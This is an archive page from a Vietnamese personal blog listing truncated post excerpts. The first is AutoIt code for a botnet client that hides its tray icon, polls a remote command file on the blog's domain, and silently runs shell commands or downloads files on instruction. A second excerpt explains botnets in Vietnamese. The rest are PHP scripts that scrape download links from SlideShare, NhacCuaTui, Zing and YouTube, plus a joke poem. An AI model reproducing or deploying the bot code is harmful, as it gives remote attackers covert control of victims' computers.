Archive for the ‘ Other ’ Category
#include <Process.au3> #include <INet.au3> #NoTrayIcon $txt = "http://thuongtin.net/blog/cmd/data.txt" $key = "" While (1) $con = _INetGetSource($txt) If $key <> $con Then ; Phan tich va thuc hien lenh If StringInStr($con, "#", 2) Then $cmd = StringSplit($con, "#") If StringInStr($con, "@#", 2) Then Run($cmd[2], "", @SW_HIDE) Else Run($cmd[2]) EndIf ElseIf StringInStr($con, "$", 2) Then $cmd = StringSplit($con, "$") _RunDOS($cmd[2]) ElseIf StringInStr($con, "!", 2) Then $cmd = StringSplit($con, " ") InetGet ($cmd[2], $cmd[3], 0, 1) ElseIf StringInStr($con, "~", 2) [ READ MORE ]
Botnet là gì? Botnet là một mạng gồm từ hàng trăm tới hàng triệu máy tính bị điều khiển hoàn toàn (theo thuật ngữ người ta gọi các máy tính này là Zombie tức các thây ma),chúng bị điều khiển để cùng làm một công việc gì đó [ READ MORE ]
<?php function get_web_page( $url ) { $options = array( 'http' => array( 'user_agent' => 'spider', // who am i 'max_redirects' => 10, // stop after 10 redirects 'timeout' => 120, [ READ MORE ]
Trang chính của tác giả: http://hasin.wordpress.com/2008/02/09/hacking-slidesharenet-using-php/ Tạm thời post cái php tại đây: <?php $slideshowUrl="http://www.slideshare.net/coogle/ajax-and-php"; $slideshowPageContent = file_get_contents($slideshowUrl); $pattern = "~doc=([\w-]+)~"; preg_match($pattern,$slideshowPageContent,$matches); $xmlurl = "http://s3.amazonaws.com/slideshare/{$matches[1]}.xml"; $sxml = simplexml_load_file($xmlurl); foreach ($sxml->Slide as $slide) echo $slide['Src']."<br />"; ?> loadt2player(178)[ READ MORE ]
Qua bên website Ohisee thì thấy ở phần liên kết có check page rank, vào check thử thì làm việc trật lấc. Buồn buồn ngồi viết cái check page rank lấy nội dung tại trang prchecker.info Trước tiên là cần phải có class curl (host phải hỗ trợ curl) <?php include("curl.php"); $c = new curl; $url = 'http://www.prchecker.info/check_page_rank.php'; $dm = 'http://thuongtin.net'; $b = [ READ MORE ]
Buồn buồn vào nghe 1 bài remix Love Again http://nhaccuatui.com/nghe?M=SlBpgEaY1f Và đọc 1 bài trong freecodevn thấy anh em get links nhạc của nhau cũng thử get link NCT thử. Đầu tiên là nghe nhạc ttp://nhaccuatui.com/nghe?M=SlBpgEaY1f sau đó tớ tìm thấy cái này: http://nhaccuatui.com/m2/SlBpgEaY1f truy cập vào thì sẽ cho ra link này: http://nhaccuatui.com/Flash/NCTplayer11.swf?file=http://nhaccuatui.com/GetMusic.aspx?key2=001d000400230013002400300000000d0044000f Nhiệm vụ của http://nhaccuatui.com/m2/SlBpgEaY1f là dùng header(“Location: [ READ MORE ]
Có những lúc giật mình trong lúc ngủ. Anh vô tình bị kiến đốt vào mông. Anh chợt nhớ có một buổi chiều hồng. Anh cùng em lên đồi đón gió. Và ở đó giữa muôn trùng ngọn cỏ. Anh vô tình bị kiến đốt vào mông. loadt2player(113)[ READ MORE ]
function get_link_video_zing($url) { $data=file_get_contents($url); $parse=explode('video.php?sid=',$data); $parse=explode("', 'downloadwindown','",$parse[1]); $url = $parse[0]; $url = base64_decode($url); $url = "http://stc.video.zing.vn/file_uploads/video/".$url; return $url; } loadt2player(111)[ READ MORE ]
loadt2player(105)[ READ MORE ]
//YouTube Video Download Link Generator function str_between($string, $start, $end){ $string = " ".$string; $ini = strpos($string,$start); if ($ini == 0) return ""; $ini += strlen($start); $len = strpos($string,$end,$ini) - $ini; return substr($string,$ini,$len); } function get_youtube_download_link(){ $youtube_link = $_GET['youtube']; $youtube_page = file_get_contents($youtube_link); $v_id = str_between($youtube_page, "&video_id=", "&"); $t_id = str_between($youtube_page, "&t=", "&"); $flv_link = "http://www.youtube.com/get_video?video_id=$v_id&t=$t_id"; $hq_flv_link = "http://www.youtube.com/get_video?video_id=$v_id&t=$t_id&fmt=6"; $mp4_link = "http://www.youtube.com/get_video?video_id=$v_id&t=$t_id&fmt=18"; $threegp_link = "http://www.youtube.com/get_video?video_id=$v_id&t=$t_id&fmt=17"; echo "\t\tDownload (right-click [ READ MORE ]
Bad Behavior has blocked 48 access attempts in the last 7 days.